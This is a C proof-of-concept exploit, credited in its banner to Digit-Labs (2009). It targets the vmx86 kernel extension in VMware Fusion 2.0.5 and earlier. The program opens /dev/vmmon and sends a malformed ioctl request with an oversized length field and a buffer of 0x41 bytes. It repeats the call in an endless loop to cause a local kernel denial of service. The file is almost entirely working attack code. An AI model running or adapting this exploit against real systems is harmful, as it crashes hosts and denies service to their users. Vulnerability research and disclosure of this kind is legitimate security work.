
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct ioctl_req_buf {int len; struct ioctl_req_buf* uaddr; } ;
struct ioctl_req {int len; struct ioctl_req* uaddr; } ;


 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int O_RDONLY ;
 int VMX86_IOCTL ;
 int exit (int ) ;
 int fprintf (int ,char*,char*) ;
 int ioctl (int,int ,struct ioctl_req_buf*) ;
 int memset (struct ioctl_req_buf*,int,int) ;
 int open (char*,int ) ;
 int printf (char*) ;
 int stderr ;

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  struct ioctl_req_buf buf;
  int fd, r;

  printf ("VMware Fusion <= 2.0.5 vmx86 kext local kernel denial of service PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  fd = open ("/dev/vmmon", O_RDONLY);
  if (fd < 0)
    {
      fprintf (stderr, "%s: open failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  memset (&req, 0, sizeof req);
  req.uaddr = &buf;

  memset (&buf, 0x41, sizeof buf);
  buf.len = 0xAAAAAAA;

  printf ("* hitting...\n");
  while (1)
    r = ioctl (fd, VMX86_IOCTL, &req);


  return (EXIT_SUCCESS);
}
